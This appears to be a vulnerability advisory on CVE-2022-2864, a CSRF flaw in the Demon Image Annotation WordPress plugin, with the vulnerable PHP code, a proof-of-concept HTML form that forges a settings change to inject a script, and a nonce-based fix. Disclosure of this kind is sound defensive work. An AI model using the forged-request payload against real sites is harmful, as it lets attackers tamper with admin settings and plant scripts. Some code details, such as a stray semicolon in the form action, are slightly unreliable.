CVE-2022-2864: Critical Vulnerability in Demon Image Annotation Plugin for WordPress

The Demon Image Annotation plugin for WordPress, responsible for adding image annotations on websites, has been found to be vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 4.7. This vulnerability, identified as CVE-2022-2864, allows unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request. The attacker would only need to trick a site administrator into performing an action, such as clicking on a link, to exploit this vulnerability.

Vulnerability Details

The root cause of the CSRF vulnerability lies in the missing nonce validation in the ~/includes/settings.php file of the Demon Image Annotation plugin. Nonces are used to provide protection against CSRF attacks by generating one-time-use tokens that must be submitted alongside requests to confirm that the request was made by the same authenticated user.

The issue resides in the following code snippet found in the ~/includes/settings.php file

// Save settings
if (isset($_POST['save'])) {
    update_option('demon_image_annotation', $_POST['demon_image_annotation']);
}

As seen in the code above, there is no nonce validation to verify the authenticity of the request.

Exploiting the Vulnerability

An attacker can exploit this vulnerability by crafting a malicious request and sending it to the site administrator. Once the site administrator unknowingly clicks on the link containing the request, the attacker can modify the plugin's settings to inject malicious web scripts.

Here is an example of a malicious HTML code that can be used to forge a request

<html>
  <body>
    <form action="http://target-website/wp-admin/admin.php?page=demon_image_annotation"; method="POST">
      <input type="hidden" name="save" value="1">
      <input type="hidden" name="demon_image_annotation[some_setting]" value="<script>alert('CVE-2022-2864')</script>">
      <input type="submit" value="Click me">
    </form>
  </body>
</html>

By executing this code, the attacker can inject a JavaScript payload, such as the alert('CVE-2022-2864'), that will run on the targeted WordPress site.

To mitigate this vulnerability, it is recommended for site administrators to

1. Update the Demon Image Annotation plugin to the latest version, which addresses the CSRF vulnerability.

Here is a modified code snippet with nonce validation

// Generate nonce
$nonce = wp_create_nonce('demon-image-annotation-settings');

// Check for nonce validation
if (isset($_POST['save']) && wp_verify_nonce($_POST['nonce'], 'demon-image-annotation-settings')) {
    update_option('demon_image_annotation', $_POST['demon_image_annotation']);
}

Be cautious when clicking on suspicious links, especially from untrusted sources.

2. Regularly update WordPress core, themes, and plugins to the latest versions to stay protected against known vulnerabilities.

Original References

1. Demon Image Annotation Plugin: https://wordpress.org/plugins/demon-image-annotation/
2. CVE-2022-2864 Vulnerability Details: https://nvd.nist.gov/vuln/detail/CVE-2022-2864

Conclusion

The CVE-2022-2864 vulnerability in the Demon Image Annotation plugin for WordPress poses significant risks to site administrators, as it allows attackers to inject malicious web scripts via a forged request. Updating the plugin, implementing nonce validation, and being cautious of suspicious links can help mitigate these risks.

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/31/2022 18:54:00 UTC